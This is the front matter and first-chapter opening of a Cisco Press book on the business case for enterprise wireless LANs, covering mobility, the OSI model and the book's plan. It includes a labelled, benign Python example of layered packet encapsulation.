
The Business Case for Enterprise-Class Wireless Lans

By H. David Castaneda, Oisin Mac Alasdair, Christopher A. L. Vinckier


Publisher: Cisco Press
Pub Date: May 16, 2006
Print ISBN-10: 1-58720-125-9
Print ISBN-13: 978-1-58720-125-7
Pages: 456


A comprehensive guide to analyzing the business rationale for WLANs


Evaluate the business rationale behind the deployment of WLANs, including return on investment
(ROI), net present value, payback period, and total cost of ownership
Develop a robust execution plan to deploy and operate the WLAN
Understand the high-level technical issues of deploying and managing your WLAN from a business
decision-maker's perspective
Maximize the positive impact of supplementary and complementary services such as voice, video,
and guest WLAN access
Identify potential security threats and develop strategies to mitigate attacks
Learn methodological and technical best practices from WLAN deployment case studies featuring
real-world, enterprise-class businesses and institutions
Gather information easily by referring to quick reference sheets and appendixes covering an
antenna overview, a high-level sample project plan, checklists, and flowcharts

Businesses today are increasingly adopting wireless LANs (WLANs) as a primary data transport
mechanism. To determine when and how to effectively deploy WLANs, business managers, project
managers, and IT executives need a clear, holistic evaluation of the business benefits and risks behind
this complex technology solution.

The Business Case for Enterprise-Class Wireless LANs helps you make the right decisions by explaining
the business value and cost of investing in a WLAN, from security and architecture to deployment and
application. Using a lifecycle perspective, this guide covers the value proposition, cost justification, and
alignment of security, design, and operational components within the business.

Written in an approachable style, The Business Case for Enterprise-Class Wireless LANs provides a
baseline analysis of WLAN technologies for a large-scale deployment and includes concise real-world
case studies with checklists and flowcharts that you can adapt for your needs. By recognizing the
obstacles and advantages of implementing a WLAN from a strategic and justified business perspective,
you can apply the economic benefits to your organization and ensure a timely and efficient deployment
of your organization's WLAN.

This volume is in the Network Business Series offered by Cisco Press. Books in this series provide IT
executives, decision makers, and networking professionals with pertinent information about today's
most important technologies and business strategies.

Table of Contents

Copyright
About the Authors
About the Technical Reviewers
Acknowledgments
Icons Used in This Book
Command Syntax Conventions
Introduction
Chapter 1. Introduction to Wireless LAN Technologies
Value of Mobility
OSI Layers and WLANs
A Brief History of WLANs
How Wireless Networks Function
Summary
Endnotes
Chapter 2. Business Considerations
Aligning Technology Solutions with Business Considerations
Economic Considerations
The Role of Infrastructure
Measuring the Business Value of Deploying Wireless
Summary
Chapter 3. Preparation and Planning
Solutions Lifecycle
Preparation
Planning
Summary
Chapter 4. Supplementary and Complementary Services
Voice
Video
Guest Networking
WLAN Location Services
Summary
Additional Resources

Chapter 5. Guidelines for A Successful Architecture and Design
Architectural Considerations
Design Considerations
Environmental Considerations
Summary
Chapter 6. Wireless LAN Deployment Considerations
In-House Deployment Versus Outsourced Deployment
Architectural Milestones
Deployment Dependencies
Management
Support
Deploying the WLAN
WLAN Controller Configuration
WLAN Controller Installation
Deployment Checklist
Summary
Chapter 7. Security and Wireless LANs
Wireless Security in Your Enterprise
WLAN Security Threats
Wireless Security Mitigation Techniques
Building a Secure WLAN
Summary
Chapter 8. Management Strategies for Wireless LANs
Solutions Lifecycle
Management Strategies
FCAPS
Comparing Centralized and Distributed Management
WLAN Management
Challenges Unique to WLAN Management
Security Settings Management
WLAN Reporting and Alerting
Management Tools
Summary
Chapter 9. Enterprise Case Study
Business Model
Technology Considerations
Enhanced Services
Security
Deployment and Implementation
Ongoing Project Management and Process
Business Benefits of the Solution
What the Future Holds
Summary
Endnotes
Chapter 10. Healthcare Case Study
Business Model
Technology Considerations
Project Management and Process
What the Future Holds
Summary
Chapter 11. Manufacturing Case Study
Business Model
Technology Considerations
Deployment
What the Future Holds
Summary
Chapter 12. Education Case Study
Business Model
Architectural Principles
Network Management
Service and Support
Client Management
Security and Rogue AP Detection
Deployment and Implementation
Ongoing Project Management and Process
Challenges
Lessons Learned and Recommendations
Measuring the Benefits
What the Future Holds
Summary
Appendix A. Wireless LAN Standards Reference
Appendix B. Wireless LAN Security References
Cisco Resources
WEP
WPA
WPA2
802.1x
EAP Types
Vulnerabilities
Appendix C. Example Project Plan for an Enterprise-Class WLAN Deployment
Company Background
The Project Plan
Summary
Glossary
Numbers
A
B
C
D
E
F
G
H
I
K
L
M
O
P
Q
R
S
T
U
V
W
Index

Copyright
The Business Case for Enterprise-Class Wireless LANs
H. David Castaneda, Oisin Mac Alasdair, Christopher A. L. Vinckier
Copyright 2006 Cisco Systems, Inc.
Published by:
Cisco Press
800 East 96th Street
Indianapolis, IN 46240 USA
All rights reserved. No part of this book may be reproduced or transmitted in any form or by any means,
electronic or mechanical, including photocopying, recording, or by any information storage and retrieval
system, without written permission from the publisher, except for the inclusion of brief quotations in a
review.
Printed in the United States of America 1 2 3 4 5 6 7 8 9 0
First Printing May 2006
Library of Congress Cataloging-in-Publication Number: 2004104127

Warning and Disclaimer


This book is designed to provide information about wireless LANs. Every effort has been made to make
this book as complete and as accurate as possible, but no warranty or fitness is implied.
The information is provided on an "as is" basis. The authors, Cisco Press, and Cisco Systems, Inc., shall
have neither liability nor responsibility to any person or entity with respect to any loss or damages
arising from the information contained in this book or from the use of the discs or programs that may
accompany it.
The opinions expressed in this book belong to the authors and are not necessarily those of Cisco
Systems, Inc.

Feedback Information
At Cisco Press, our goal is to create in-depth technical books of the highest quality and value. Each book
is crafted with care and precision, undergoing rigorous development that involves the unique expertise
of members from the professional technical community.
Readers' feedback is a natural continuation of this process. If you have any comments regarding how we
could improve the quality of this book or otherwise alter it to better suit your needs, you can contact us
through e-mail at feedback@ciscopress.com. Please make sure to include the book title and ISBN in your
message.
We greatly appreciate your assistance.

Trademark Acknowledgments
All terms mentioned in this book that are known to be trademarks or service marks have been
appropriately capitalized. Cisco Press or Cisco Systems, Inc. cannot attest to the accuracy of this
information. Use of a term in this book should not be regarded as affecting the validity of any trademark
or service mark.

Publisher: Paul Boger
Cisco Representative: Anthony Wolfenden
Cisco Press Program Manager: Jeff Brady
Executive Editor: Mary Beth Ray
Production Manager: Patrick Kanouse
Development Editor: Dayna Isley
Senior Project Editor: San Dee Phillips
Copy Editor: Ben Lawson Publishing
Technical Editors: John Elliott, Fred Niehaus, Jack Unger
Editorial Assistant: Raina Han
Book and Cover Designer: Louisa Adair
Composition: Mark Shirar
Indexer: Tim Wright
Proofreader: Karen A. Gill

Dedications
We dedicate this book to our parents, spouses, and children.

About the Authors


H. David Castaneda is a senior technical member of the Cisco Systems Advisory Services group. In
this role, he is responsible for consulting with the top-tier customers of Cisco about the value and
application of advanced technologies. Before his current role, David was the architect and technical lead
for the internal wireless LAN strategy and deployment at Cisco. During his eight-year tenure at Cisco, he
has held various positions in the United States and Europe.
Oisin Mac Alasdair is an IT program manager with the Cisco Intelligent Network Solutions group within
IT infrastructure. Oisin has been responsible for the Cisco enterprise wireless strategy and architecture
for the past six years. He continues to define Cisco IT's wireless direction and represents Cisco IT's
strategy and vision for wireless technologies to customers, the media, and the business. Before joining
Cisco, Oisin had several architectural and consultancy roles with Fortune 100 companies in the finance
and IT industries in the Asia-Pacific region and Europe. Oisin is the proud father of a brand new baby girl
and is a loving husband to his beautiful Australian wife.
Christopher A. L. Vinckier is an engagement manager with the Cisco Systems Advisory Services
group. In this role, he assists customers in solving the perennial problems of business technology
alignment, adoption, and absorption. He has advised several of the largest Fortune 500 customers of
Cisco on the strategic, operational, and financial benefits of IP-based infrastructure solutions.
Christopher holds an MS in computer engineering from the University of Ghent, Belgium and an MBA in
finance from MIT's Sloan School of Management.

About the Technical Reviewers


John Elliott, CCIE No. 2095, has worked in communications for 15 years and has been at Cisco more
than 8 years. He has worked with 802.11 technologies since Cisco acquired Aironet in 1999 and has
worked with deployments of 802.11 both large and small using 802.11a, 802.11b, and 802.11g. He also
has extensive experience in wireless security and has worked with many customers in deploying 802.1x,
Wi-Fi Protected Access (WPA), WPA2, and other security technologies. He has also worked in
deployments of wireless management systems such as the Cisco WLSE. John earned a bachelor of
science in computer science at the University of Arkansas at Fayetteville.
Fred Niehaus is a technical marketing engineer for the wireless networking business unit at Cisco
Systems, Inc. Fred has extensive customer contact and is responsible for developing and marketing
enterprise-class wireless solutions using Cisco Aironet and Airespace Series Wireless LAN products.
Before joining the Cisco wireless networking business unit as a result of the acquisition of Aironet, Fred
worked as a support engineer for Telxon Inc., designing some of the very first wireless implementations
for customers such as Wal-Mart, Ford, Hertz Rent-A-Car, and Kroger. Fred has been in the data
communications and networking industry for the past 20 years and holds a Radio Amateur (Ham)
License "N8CPI."
Jack Unger, founder and president of Ask-Wi.Com, Inc., and Wireless InfoNet, Inc., has served the
broadband wireless industry continuously since 1993 designing, installing, troubleshooting, and
optimizing wireless networks. Jack also serves as a wireless-industry trainer and author. His vendor-neutral handbook, Deploying License-Free Wireless Wide-Area Networks, was published in 2003 by Cisco
Press. In workshops across the United States and Canada, Jack has personally trained more than 1500
ISP personnel in the deployment of outdoor wireless networks.

Acknowledgments
Jim Schachterle deserves a tremendous amount of kudos for his contribution as the initial editor of this
book. In addition to being knowledgeable, organized, flexible, and helpful, he also was an exceptionally
patient coach in kick-starting this project.
Mary Beth Ray did a superb job managing this project to the end. Her positive attitude and
receptiveness made our job a lot easier.
Thanks to Raina Han for her belief in us, her inexhaustible dedication to the project as the editorial
assistant, her timely cracking of the whip, and her exquisite sense of humor.
Thanks to Dayna Isley as the development editor of Cisco Press for her top-notch editing, attention to
detail, and timeliness.
The entire Cisco Press team worked tirelessly behind the scenes. We wish to thank everybody in
editorial, illustration, layout, and the rest of the production team for their contributions.
John Elliott, Fred Niehaus, and Jack Unger, the technical reviewers, made this book much better than we
could have hoped to achieve on our own. We thank them for their expertise, advice, and editing.
Thanks to Bill Coyle, Pat Regan, Bill Hodge, Dennis Virkler, Doug Roberts, Dave Hemendinger, and the
Cisco IT WLAN team for their contributions on the case studies.
Acknowledgments from H. David Castaneda: I would like to acknowledge the many people who, over
time, have influenced and provided the opportunities that have made me a success today. Personally I
would like to acknowledge my fellow authors, the Cisco EMEA networking team, and especially the Cisco
wireless networking business unit, who have supported us over time in developing our skills and
experience in the wireless world. Finally, and most importantly to my family, my wife Liinu who keeps
me centered and is my constant supporter, my son Noah and daughter Nella who have had to deal with
the many moments when I did not have time for them. This book is for them.
Acknowledgments from Oisin Mac Alasdair: I would like to thank my coauthors for their partnership,
Bruce Scott and David Renaud of Griffith University for their friendly assistance, Sergey Shitov of Cisco
IT for being an inspiration to work with and a world-class technical lead in the Cisco wireless space for
many years, and Sarah, my ever-patient wife and mother to our beautiful new baby girl: "This one's for
you, Niamh!"
Acknowledgments from Christopher A. L. Vinckier: I would like to thank my parents for their dedication
and for helping me get where I am today. Dad continues to be the source of inspiration for intellectual
curiosity and Mom for instilling in me the pursuit of excellence. I also want to thank David and Oisin for
making this project as fun as it has been, my friends from MIT for bouncing ideas off and keeping me
focused, and finally Lana for her patience, understanding, and support, and for making me start every
day with a smile.
Finally, we want to acknowledge our friends at Cisco who have always been very supportive of this
effort. We especially wish to thank our managers Mike Norman, Greg Duncan, Dave Evans, Stuart Doyle,
Chris Webber, and Paul McNabb for their patience and support.

Icons Used in This Book

Command Syntax Conventions


The conventions used to present command syntax in this book are the same conventions used in the
IOS Command Reference. The Command Reference describes these conventions as follows:
Boldface indicates commands and keywords that are entered literally as shown. In actual
configuration examples and output (not general command syntax), boldface indicates commands
that are manually input by the user (such as a show command).
Italics indicate arguments for which you supply actual values.
Vertical bars (|) separate alternative, mutually exclusive elements.
Square brackets [ ] indicate optional elements.
Braces { } indicate a required choice.
Braces within brackets [{ }] indicate a required choice within an optional element.

Introduction
Several good books have been written on the various technical aspects of wireless local-area networks
(WLANs), including devices, networking protocols, and radio technologies. Network designers and
administrators wanting to learn and apply the technical nuts and bolts of WLANs have no shortage of
reference material to consult.
What is more challenging to find is a single reference on the lifecycle aspects of WLAN solutions, that is, a
guide that covers the business considerations, which include the value proposition, cost-justification, and
alignment of security, architecture, and operational components with the business. We wrote this book
to address that shortage by examining WLANs from a lifecycle perspective. The scope extends from the
identification of the business value that a WLAN can bring to your organization to how to build and
operate your enterprise-class WLAN.
Today, the evolution of WLANs and the subsequent penetration into the enterprise market have moved
faster than ever expected. This trend is expected to accelerate over the next couple of years. However,
the increased and accelerated up-take will not occur haphazardly. Following the IT investment frenzy of
the 1990s, scrutiny and accountability have become the new norms when it comes to evaluating and
pursuing technology investments. Understanding the intricacies of a technology provides little value
when evaluating the business benefits that IT management requires. Indeed, it is more crucial to
understand the organizational value that the technology solution offers and the risks that are inherently
associated with it. These requirements drive an increased need for understanding how a particular
technological solution can impact your organization, why an investment in the technology makes
economic sense for the organization, and what the organization should do in terms of architecture,
deployment, and operation strategies.
The nature of LANs has evolved to include the adoption of wireless transport as a primary medium.
Today, enterprise-class equipment and solutions enable companies to pursue aggressively an investment
in wireless LAN technology. However, this relatively simple transport mechanism can quickly become
complex when introduced into the enterprise.
A holistic assessment of the opportunity to leverage WLANs in an organization requires not only an in-depth understanding of the strengths and weaknesses of WLAN technologies but also identification of
opportune areas of application and legitimizing of the use of WLANs in your specific organizational
ecosystem. Economic considerations must be made, and various methodologies and frameworks can be
drawn upon to develop a relevant and robust WLAN business case. This process will not only ensure a
comprehensive approach for the evaluation of WLANs but also increase the speed and accuracy of the
assessment of the business proposal by the key stakeholders.
When the time comes to tackle the question of how to plan, design, implement, and operate a WLAN in a
scalable, reliable, and secure fashion in your organization, it will quickly become clear that these
domains are inherently strewn with barriers.
The Business Case for Enterprise-Class Wireless LANs takes a business approach to wireless networking.
This goal is achieved by focusing more on strategic and business justifications and less on the intricacies
of the underlying technology. However, a baseline analysis of WLAN technology is included, empowering
you to understand the complex technology-related decisions detailed later. Most books on WLANs go into
great technical detail and are therefore off-putting to our audience. Therefore, this book will not cover
WLAN technology to that degree of detail.
The book also provides advice on the business and high-level technical issues you should consider.
Specifically, the book offers guidance on how to identify and mitigate challenges surrounding large-scale
enterprise deployments. Finally, because real-world examples form a valuable baseline against which to
compare your specific WLAN consideration, various case studies of WLAN deployments in large
organizations are included to complement and ground the theoretical methodologies and frameworks.

Objectives
Among the many concerns that arise when considering WLANs for an enterprise environment, several
are more common than others and clearly stand out. These recurring apprehensions include
No clear view of the benefits
Security concerns
Budgetary constraints
Additional worries include such items as performance and reliability, network coverage, lack of expertise,
and management challenges.
The goal of this book is to address these concerns by arming you with the necessary information to
assess the value of WLANs in your organizations and develop a robust execution plan to deploy and
operate the WLAN. The book is not intended as a highly technical guide for network engineers. Instead,
its goal is to provide upper and middle management with the necessary technological understanding of
WLANs to perform a realistic and sound assessment of WLAN investment and deployment decisions. In
addition, the book intends to assist program managers and project staff who are responsible for the
actual deployment by conveying recommended practices, exposing known risks, and imparting
remediation techniques.
For this purpose, the book leverages the PPDIOO technology lifecycle to construct a phased and
exhaustive approach for evaluating and managing the addition of WLANs to the IT infrastructure
portfolio. The PPDIOO lifecycle methodology consists of six distinct yet interlinked phases. The phases
are as follows:
Preparation
Planning
Design
Implementation
Operation
Optimization
As the nomenclature implies, each phase has distinct focus areas and characteristics. The methodology
adopted by the book explores each phase in depth to develop an overarching view of the considerations
that are required when exploring the potential value of deploying and operating WLANs in your
organization.

Audience
This book focuses on how to understand, identify, and manage the value that WLANs can bring to
organizations. As such, it is not designed to be a general networking topics book, and it is also not
designed to be an in-depth technical reference on WLAN technologies. The book primarily targets
business and management decision makers and those with the responsibility for architecture and
deployment of enterprise-class WLANs. The book provides advice to the decision maker on the business
and high-level technical issues they should consider for evaluating the investment decision of deploying
WLANs and ensuring the sound execution of the deployment of the WLAN.
The audience for this book can thus be segmented into a primary and secondary audience:
The primary audience consists of business decision makers who shoulder the accountability for
making the investment decision and ensuring the positive deployment and operation thereof at the
program level.
The secondary audience consists of IT engineers and project managers who are responsible for the
actual deployment and who want to strengthen their understanding of the upstream decision-making process and best practices for WLAN deployments.
The primary audience should possess a strong background in enterprise-level projects. Executive-level
readers should have accountability for long-term enterprise infrastructure projects and programs.
Competency in strategic planning, technology delivery, and large-scale (global) deployment is highly
recommended. An understanding of Ethernet and wireless Ethernet technologies would be beneficial for
technical leadership readers.
The secondary audience should have an understanding of the target market for WLANs and their
benefits. Although it is not a necessity, the secondary audience should have a basic understanding of
wireless technology. A solid background in project management is assumed for most readers.

Organization and Approach


The Business Case for Enterprise-Class Wireless LANs focuses on the decision making and business
justification in addition to the WLAN execution program management effort. Throughout the book, you
find reader-friendly descriptions, quick reference sheets, diagrams, and visual layouts that aid in
explaining all topics. Case studies provide real-world touchpoints on the topics discussed. The book
adopts a four-part structure, as follows:
Part I, "The Fundamentals of Wireless LAN Strategic Planning," provides a succinct
technical introduction to the technology and concepts surrounding wireless networking. This section
also outlines the strategic rationale and business drivers that you will have to consider when
contemplating a WLAN deployment. You will be given explanations of how to construct a strategic
outlook based on financial, technological, and operational considerations, thus providing the
foundation for making well-informed business decisions. Additionally, Part I is designed to allow
you to address high-level technical architecture interests. Part I includes the following chapters:
Chapter 1, "Introduction to Wireless LAN Technologies" This chapter will help you
develop the basic understanding of WLAN technology that is needed for effectively using this
book. The OSI framework illustrates how WLANs relate to other internetworking technologies,
including LAN, WAN, and mobile cellular solutions. The framework will also help position the
WLAN-specific concepts that are covered throughout the remainder of this chapter.
Chapter 2, "Business Considerations" This chapter provides frameworks for tackling the
challenge of business-technology alignment and identification of opportune application points
for WLANs within the organizational ecosystem. Quantitative, qualitative, and risk
considerations are covered to provide an exhaustive view. Finally, given the importance of
economic returns, the most common financial barometers including return on investment,
payback period, Net Present Value, and internal rate of return are described in detail.
Chapter 3, "Preparation and Planning" This chapter focuses on the preparation and
planning considerations that are critical for successfully deploying your enterprise WLAN. Our
aim is to provide a structured approach for your deployment, highlighting areas that require
preparatory work, as you need to identify management and technical dependencies that are
unique to your context.
Chapter 4, "Supplementary and Complementary Services" This chapter covers
supplementary services and applications. These include voice, video, guest WLAN access, and
location-based services (LBS). Complementary and supplementary services greatly increase
the complexity of your network by adding several incremental challenges. This chapter
outlines the benefits and challenges that are associated with each enhanced service. In
addition, strategies to identify the proper mix and implementation of these services are
discussed to maximize the positive impact and success of the services.
Part II, "Wireless LAN Architecture, Design, and Deployment," addresses the key areas of
architecting, designing, and deploying an enterprise-class WLAN. Most of the concepts focus on
enterprise deployments, although some examples are easily transposable to non-enterprise
environments. This part also deals with the challenges of WLAN security, which covers security
concepts, threats, and mitigation strategies in more detail. Finally, Part II provides recommended
practices for managing your WLAN after it has been deployed. This part of the book includes the
following chapters:
Chapter 5, "Guidelines for a Successful Architecture and Design" This chapter
demystifies the process of creating a scalable and robust WLAN design. The focus is on
providing a structured catalog of fundamental architectural considerations that will help you
construct an efficiently functioning WLAN. The chapter also provides recommendations on how
to develop a successful architecture. Finally, it clarifies the most important technical aspects
of wireless LANs that do not apply to traditional wired ones.
Chapter 6, "Wireless LAN Deployment Considerations" This chapter discusses the
implementation considerations that are required when deploying an enterprise-class WLAN.
Enterprise-class WLAN deployments are complex and lengthy processes that include many
interdependent factors. Methodologies and frameworks are provided that will help guide the
WLAN deployment along the critical path and minimize the execution risk associated with the
program.

Chapter 7, "Security and Wireless LANs" This chapter describes how to think securely in
the context of IT communications infrastructure. Fundamental security vulnerabilities are
tackled, and methods are provided for identifying security threats. Security terms and
protocols are introduced in addition to key WLAN security components and security standards.
Finally, the chapter discusses how to address the security threat and craft a scalable security
management strategy and platform.
Chapter 8, "Management Strategies for Wireless LANs" This chapter introduces the
fundamentals of wireless network management, the unique challenges associated with
managing wireless networks, and the various strategies that can be adopted to support this
critical area.
Part III, "Wireless LAN Deployment Case Studies," provides real-world case studies of WLAN
solutions implemented by various enterprise-class institutions. These studies outline the
requirements and constraints from these institutions and reveal the recommended practices for
each. Key hurdles and lessons learned from actual deployments complement the ideals and
theoretical notions outlined in this book. This part includes the following chapters:
Chapter 9, "Enterprise Case Study" This chapter provides a detailed case study of the
global WLAN deployment of Cisco Systems Inc. The question for Cisco IT was not whether
WLANs should be deployed, because Cisco had long since identified the many benefits offered
by the technology, but rather how Cisco could cost-effectively maintain control, reduce overall
support costs, ensure that a secure wireless infrastructure was used, and still provide benefits
to Cisco employees. This chapter discusses why and how Cisco pursued its enterprise-wide
WLAN deployment.
Chapter 10, "Healthcare Case Study" This chapter covers the strategic drivers of
Lifespan's WLAN deployment and the progressive uses of WLAN in the healthcare
environment. The WLAN's impact on Lifespan's business model is discussed, as is the strategy
that the organization employed for designing, implementing, and operating its WLAN solution.
Chapter 11, "Manufacturing Case Study" This chapter discusses a deployment of a WLAN
in a large and successful manufacturing company. The specific demands and constraints that
the manufacturing industry imposes on WLANs are touched upon, as are the strategies that
the company employed to accommodate these specific needs.
Chapter 12, "Education Case Study" This chapter introduces an extremely successful
deployment of WLANs in the educational vertical. Griffith University in Queensland, Australia,
deployed a university-wide WLAN to provide increased IT services, reduce the load on existing
computing labs, and supplement the existing wired network infrastructure. This chapter
covers the rationale for providing students and staff with the mobility benefits offered by
WLAN technology and how the university executed its plan.
Part IV, "Appendixes," includes the following:
Appendix A, "Wireless LAN Standards Reference" This appendix provides summary
descriptions of the various WLAN standards, including the infamous "802.11 alphabet soup."
Appendix B, "Wireless LAN Security References" This appendix provides descriptions
and definitions of the many facets of WLAN security.

Appendix C, "Example Project Plan for an Enterprise-Class WLAN Deployment" This


appendix is composed of examples that have been proven to be successful in developing and
deploying an enterprise-class WLAN.
Finally, a glossary of terms is included for your convenience and review.

Companion Website
Join ciscopress.com and register your book to receive free supplemental content for this book. To
register, visit www.ciscopress.com/title/1587201259 and follow the instructions to log in or join. After
you register your book, you can access additional materials, including a sample WLAN deployment
project plan.

Chapter 1. Introduction to Wireless LAN Technologies

Networks have become a pervasive element of everyday life. Even though they can adopt different
physical characteristics and carry diverse payloads, they all share a common set of fundamental
attributes. The essence of a network is the fact that it connects or relates objects or devices.
The instantiation of this connection can adopt many forms. It can be intangible, as is the case in an
organizational or relational network, or it can be tangible. Examples of tangible networks include a
highway system, an electrical grid, and data communications networks. These types of networks are
designed and built to interconnect nodes so that objects can be moved between source and destination.
The highway system permits people and goods to be moved between any two points by means of a
meshed infrastructure of roads. The electrical grid transports electrons between the power generating
plants and the points of consumption. Finally, data communications networks carry information (that is,
voice, video, or data) from respective sources to destinations. The definitions of source and destination
are purposely left open because they include people in addition to mechanical and electronic machines.
The Business Case for Enterprise-Class Wireless LANs focuses on a specific subset of data networks,
namely wireless local area networks (WLANs). As such, from here on you shall see the term network
refer exclusively to data communications networks.
This chapter introduces you to the value of mobility in data communications. Various scenarios are
presented to briefly illustrate the socioeconomic benefits of mobility solutions. This chapter focuses on
helping you develop an understanding of WLAN technology. We illustrate the OSI framework and how
WLANs relate to other internetworking technologies that include LAN, WAN, and mobile cellular solutions.
The framework will also help position the WLAN-specific concepts that are covered throughout the
remainder of this chapter.

Value of Mobility
Information has become the engine of our society. It forms the basis of entire industries as in services,
media, and advertising. Information provides a competitive advantage to other industries such as
financial services, manufacturing, and transportation. Government uses information to preempt and
address security threats. The entire educational system is based upon information transfer to pupils.
Finally, information is a means of relaxation and entertainment for many of us. Literature, music,
television, and movies are in their most abstract form sources of information. As such, information's
value and uses are tremendously varied and exceptionally wide in scope.
Over time, businesses and people have come to want and expect accessibility to their source of
information where they want it, when they want it, and how they want it. The digital revolution has
brought us one step closer to this reality. It not only spawned an entire new industry (the information
technology industry) but literally disrupted how society conducts business, functions, and entertains itself.
Many of us today are spending our professional lives trying to leverage information and technology to
create new value propositions, capture efficiencies and cost savings, and increase productivity.
In his 1995 book Being Digital, Nicholas Negroponte, director of the Massachusetts Institute of
Technology's Media Laboratory, foresaw that the digital revolution would be a catalyst for a digital flip.[1]
Negroponte postulated that content that was traditionally delivered via terrestrial channels would be
flipped onto wireless channels. An example is telephony. At the same time, content that was typically
delivered via wireless channels would be migrated onto terrestrial carriers. For example, television used
to be delivered via radio or satellite. Today, cable-based systems are displacing the wireless distribution
medium for television. Hence, there is a flip between delivery mechanisms for content. With many
different kinds of digital technologies maturing at breakneck speeds, the opportunity arose to realign the
accessibility to information. Indeed, information can be roughly categorized into two types:
Information we want access to anywhere and anytime: Cellular mobile voice communications
is a prime example. Its explosive growth in terms of technologies and consumer adoption rates
supports the case of a large demand for anywhere and anytime access to information.
Information we consume in fixed locations: An example would be television. Most of us do not
watch television while on the move. We watch TV at home, in a hotel room, or in a lounge. We do
not necessarily require mobility for television because we tend to associate it with relaxation and
sitting down.

Note
At the time of writing, various initiatives are underway to provide high-mobility video solutions
to consumers. The strategy is to implement video-streaming by means of next-generation
cellular technologies or by extending portable music players with video capabilities. It will be
interesting to follow the uptake and success of these mobile video solutions.

You could argue that people want to be able to watch television anywhere and anytime. The key word to
focus on in this case is anywhere because storage technologies (for example, VCRs, recordable DVDs,
and DVRs) have all but made obsolete the notion of anytime. When you consider televisions, the prime
parameters that come to mind are screen size, picture quality, and price. Mobility is most likely not on
the radar. It simply does not have a high value-proposition in the case of television. This fact supports
the low adoption rate of portable televisions. Similarly, the very high adoption rate of mobile phones,
although somewhat unexpected, does stand to reason. As such, you can make a valid distinction
between applications that demand mobility and those that do not or do so to a very low degree.
In the same way that cellular technologies have extended the Plain Old Telephone Systems (POTS)
beyond the boundaries of the wired infrastructure, WLANs extend data communications networks
beyond traditional physical boundaries. The implications are vast and complex. Management guru Dr.
Clayton Christensen coined the term disruptive technology in his book The Innovator's Dilemma.
Christensen defined a disruptive technology as a new technological innovation, product, or service that
eventually overturns the existing dominant technology in the market. This occurs despite the fact that
the disruptive technology is both radically different from the leading technology and that it often initially
performs worse than the leading technology according to existing measures of performance. A disruptive
technology thus effectively comes to dominate an existing market either by filling a role in a new market
that the older technology could not fill or by successively moving up-market through performance
improvements until finally displacing the market incumbents.
Applying Christensen's definition, wireless networks are truly a disruptive technology. They are fueling
growth in companies, capturing efficiencies, boosting productivity, and causing entire industries to
rethink their business strategies.[2]
The prime benefit of WLANs is that they enable information to be moved through the ether to the point
where it is required. There is no need for hardwiring. There is also no need for line-of-sight, a barrier for
infrared communication technology. As such, WLANs provide an extendable, totally transparent means
for interconnecting entities. These entities can be personal computers (PCs), personal digital assistants
(PDAs), phones, sensors, radio frequency identification (RFID) tag transceivers, and many more. In
theory, any device that can house a radio transmitter and the appropriate software is a candidate for
becoming a WLAN node. Given the traits of transparency and the ability to connect heterogeneous types
of devices, it is important to understand the strengths and limitations of WLANs to correctly align
business or personal goals and technological solutions.
The next section provides a baseline high-level technical overview of WLANs. We compare WLANs'
positioning to other networking technologies and introduce WLAN components, their inner workings, and
operational implications. Even though this chapter is comprehensive, it is not exhaustive and does not
describe all the technical intricacies of WLAN technology.

OSI Layers and WLANs


Let us start with the idea that complex problems are usually broken down into modular components to
facilitate understanding and to make the solution more tractable. For this purpose, data communications
make use of the Open Systems Interconnection (OSI) reference model. Given the extensive coverage of
this model available in other books, this book does not intend to provide a complete and exhaustive
overview of the OSI reference model. Instead, this section provides a brief summary of the model and
focuses on the sections that are most relevant within the context of this book.

Note
The OSI model was defined by the International Organization for Standardization (ISO) and
was conceived to allow interoperability across the various platforms offered by vendors. A
provisional version of the model was first published in March 1978 and became standardized in
1979 after some minor refinements.

The OSI model breaks the overall task of communication into layers that focus on relatively delimited
and well-defined subtasks. Within this framework, two types of communication occur:
Interface: Layers communicate with their neighbors through an interface. A layer presents or
receives information from its respective adjacent layers in a standardized format through this
interface.
Protocol: The second type of communication is with a peer layer by means of a protocol. Peer
layers are at the same level but in different nodes. As such, network nodes can communicate
directly on a layer-by-layer basis with other network nodes. However, the semantics of this
communication are restricted to each layer.
The seven layers that make up the OSI reference model and the two communication types are illustrated
in Figure 1-1.
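The two kinds of communication can be made concrete in code. On the way down, each layer hands a payload to the layer below through its interface; on the way up, each layer at the receiving node parses only the header written by its own peer and passes the remainder upward. The following Python model is an added example and is not code from the book: the three-layer stack (application data, a transport header, a link header) and the header formats are constructed for illustration and do not reproduce any real protocol.

```python
# Added example (not from the book): a toy three-layer stack showing the two
# kinds of OSI communication. Interface = a layer hands bytes to its neighbor;
# protocol = a layer's header is interpreted only by its peer on the other node.
# The header formats below are constructed for illustration.
import struct

LINK_HDR = struct.Struct("!6s6sH")      # dst address, src address, payload length
TRANSPORT_HDR = struct.Struct("!HHI")   # src port, dst port, sequence number


def encapsulate(app_data: bytes, src_mac: bytes, dst_mac: bytes,
                src_port: int, dst_port: int, seq: int) -> bytes:
    """Walk down the stack: each layer wraps exactly what the layer above gave it."""
    # Transport layer receives application data through the interface and adds its header.
    segment = TRANSPORT_HDR.pack(src_port, dst_port, seq) + app_data
    # Link layer receives the segment as opaque payload and adds its own header.
    return LINK_HDR.pack(dst_mac, src_mac, len(segment)) + segment


def decapsulate(frame: bytes, my_mac: bytes) -> dict:
    """Walk up the stack on the receiving node.

    The link layer checks only its peer's header and drops frames not addressed
    to this node before any upper layer sees them; the transport layer then reads
    only its peer's header. Length fields are validated rather than trusted.
    """
    if len(frame) < LINK_HDR.size:
        raise ValueError("truncated link header")
    dst_mac, src_mac, length = LINK_HDR.unpack_from(frame)
    payload = frame[LINK_HDR.size:]
    if len(payload) != length:
        raise ValueError("link length field does not match payload")
    if dst_mac != my_mac:
        return {"accepted": False}          # peer-layer decision: not for us
    if len(payload) < TRANSPORT_HDR.size:
        raise ValueError("truncated transport header")
    src_port, dst_port, seq = TRANSPORT_HDR.unpack_from(payload)
    app_data = payload[TRANSPORT_HDR.size:]  # handed up through the interface
    return {"accepted": True, "src_mac": src_mac, "src_port": src_port,
            "dst_port": dst_port, "seq": seq, "app_data": app_data}
```

The point to notice is that `encapsulate` never inspects the application bytes and `decapsulate` never interprets a header that belongs to another layer; each field is consumed by exactly one peer. The explicit length check is the kind of validation a receiver should perform on every layer's header, because a broadcast medium such as RF delivers frames from any sender in range.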

Figure 1-1. OSI Reference Model

Note
The number seven has no specific meaning or purpose. The ISO defined the OSI reference
model and subsequently tasked subcommittees to work out the details for each layer.

The following sections provide more detail on each of the respective OSI layers.

Layer 1: Physical Layer


